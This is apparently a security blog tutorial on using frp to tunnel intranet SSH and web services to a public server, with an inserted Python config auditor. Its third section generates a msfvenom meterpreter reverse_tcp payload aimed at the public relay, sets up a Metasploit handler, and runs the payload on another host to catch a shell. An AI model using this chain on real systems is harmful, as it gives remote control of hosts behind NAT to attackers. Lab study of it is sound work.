Frp intranet penetration


In essence, intranet penetration is also a form of port mapping: both map an intranet address to an address that is reachable from the public network. The difference is that ordinary port mapping can be configured directly in the router, while the mapping set up by intranet penetration only works after the client and the server have been bound together, which is equivalent to establishing a tunnel between them. Requests sent to the server are then forwarded through the tunnel to the intranet host. It is mostly used when there is no public IP;

frp is a high-performance reverse proxy application. It can easily penetrate the intranet and provide services to the Internet. It supports TCP, UDP, HTTP, HTTPS and other protocol types, and it exposes intranet services to the public network through a transit node with a public IP in a safe and convenient way;

## Chinese documentation address:
https://gofrp.org/docs/
## GitHub download address:
https://github.com/fatedier/frp/releases

frp has a client and a server. Download the version that matches the operating system of each host. Here, two versions are downloaded, one for Windows and one for Linux;

1. Mapping intranet SSH services

Upload the linux version file to the ECS through xshell and decompress it;

## Unzip file
tar xf frp_0.33.0_linux_amd64.tar.gz

## Meaning of the files
frpc            Client program
frpc_full.ini   Client full configuration file
frpc.ini        Client simple configuration file
frps            Server program
frps_full.ini   Server full configuration file
frps.ini        Server simple configuration file

Check the simple configuration file, and configure the listening port as 7000, that is, the port for communication between the server and the client;

Start the server program;

 ## Start the server program with simple configuration
 ./frps -c ./frps.ini 

Unzip the linux version file in the local CentOS7 and modify the client simple configuration file frpc.ini;

## Client simple configuration file frpc.ini
[common]
## Public IP address of the remote virtual machine
server_addr = 123.456.789.111
## The port on which the server listens
server_port = 7000

[ssh]
## Protocol type
type = tcp
## Local IP address
local_ip = 127.0.0.1
## Local port
local_port = 22
## Port mapped on the server
remote_port = 6000

Start the client program;

## Start the client program in a simple configuration
./frpc -c frpc.ini

At this point, the server on the virtual machine shows log information for the successful connection;

Check the status of port 6000 on the virtual machine; it shows that a TCP listener has been set up;

You can now reach the intranet host by connecting with Xshell to port 6000 on the public IP of the virtual machine;
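
The simple configurations above leave the control port without a `token`, leave `allow_ports` unset on the server, and publish SSH through a plain `tcp` proxy. The following check for those gaps is an added example, not code from the original post or from the frp project; `token`, `allow_ports`, `stcp` and `sk` are frp option names, while the function names, finding labels and sample configs (including the address 203.0.113.10) are constructed for illustration.

```python
import configparser

# Constructed samples that mirror the simple configs shown on this page.
FRPS_INI = "[common]\nbind_port = 7000\n"
FRPC_INI = """[common]
server_addr = 203.0.113.10
server_port = 7000
[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22    ## Local port
remote_port = 6000
"""
SENSITIVE = {"22": "SSH", "3389": "RDP"}  # assumption: services worth flagging


def first(value):
    """First whitespace-separated token of a value, '' if empty."""
    return (value.split() or [""])[0]


def audit_frp(text, role):
    """Return findings for a legacy-INI frps ("server") or frpc ("client") config."""
    cp = configparser.ConfigParser(interpolation=None)  # inline '#' text stays in values
    cp.read_string(text)
    out = []
    common = cp["common"] if cp.has_section("common") else {}
    if not common.get("token", "").strip():
        out.append("NO_TOKEN [common]: control connection is unauthenticated")
    if role == "server" and not common.get("allow_ports", "").strip():
        out.append("ANY_PORT [common]: no allow_ports, clients may claim any remote_port")
    for name in cp.sections():
        sec = cp[name]
        for key, value in sec.items():
            if " #" in value or " ;" in value:
                out.append(f"INLINE_COMMENT [{name}] {key}: put the comment on its own line")
        port = first(sec.get("local_port", ""))
        if (name != "common" and first(sec.get("type", "tcp")) == "tcp"
                and port in SENSITIVE and sec.get("remote_port")):
            out.append(f"EXPOSED [{name}]: {SENSITIVE[port]} reachable on public port "
                       f"{first(sec['remote_port'])}; consider type = stcp with sk")
    return out


if __name__ == "__main__":
    for label, text, role in (("frps.ini", FRPS_INI, "server"),
                              ("frpc.ini", FRPC_INI, "client")):
        for finding in audit_frp(text, role):
            print(f"{label}: {finding}")
```

A server config that sets both `token` and `allow_ports` returns no findings from this check.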

2. Mapping intranet Web Services

Configure the server configuration file frps.ini: vhost_http_port is the HTTP service access port and vhost_https_port is the HTTPS service access port. Here, the HTTP service is used as an example;

## frps.ini configuration file
[common]
bind_port = 7000
vhost_http_port = 8080


Start the server program after configuration;

 ## Start the server program with simple configuration
 ./frps -c ./frps.ini 

Change the client configuration file frpc.ini;

## frpc.ini configuration file
[common]
## Public IP of the virtual machine
server_addr = 123.456.789.111
## Port the server is bound to
server_port = 7000

[web]
type = http
## Port of the local Web service
local_port = 80
## Domain name resolved to the public IP
custom_domains = www.yourdomain.com

Start the client program;

 ## Start the client program with simple configuration
 ./frpc -c ./frpc.ini

The server log shows the successful connection;

Accessing the domain name on port 8080 reaches the local Web service;

3. Configure MSF to receive shells from the public network

The server configuration file does not need to be changed, just modify the client configuration file, and then start the client program;

## frpc.ini configuration file
[common]
## Public IP of the virtual machine
server_addr = 123.456.789.111
## Port the server is bound to
server_port = 7000

[msf]
type = tcp
## Local port to be monitored
local_port = 4444
local_ip = 127.0.0.1
## Virtual machine mapping port
remote_port = 8085

Generate a payload, LHOST is specified as the public IP, and LPORT is specified as the public mapping port;

## Generate payload using msfvenom
msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=123.456.789.111 LPORT=8085 -b "\x00" -f elf -o xuyu 

Start MSF locally and configure listening. At this time, the listening LHOST is the local IP address and LPORT is the local port in the frpc.ini configuration file;

## MSF configure local listening
use exploit/multi/handler 
set payload linux/x64/meterpreter/reverse_tcp 
set LHOST 192.168.1.105
set LPORT 4444 
exploit 


Copy the payload to another CentOS host and execute it;

## Copy the payload and execute
scp xuyu root@192.168.1.6:/root/
chmod +x xuyu
./xuyu

MSF successfully received the shell;

Tags: security Web Security

Posted by Stasonis on Fri, 24 Sep 2021 20:42:11 +0530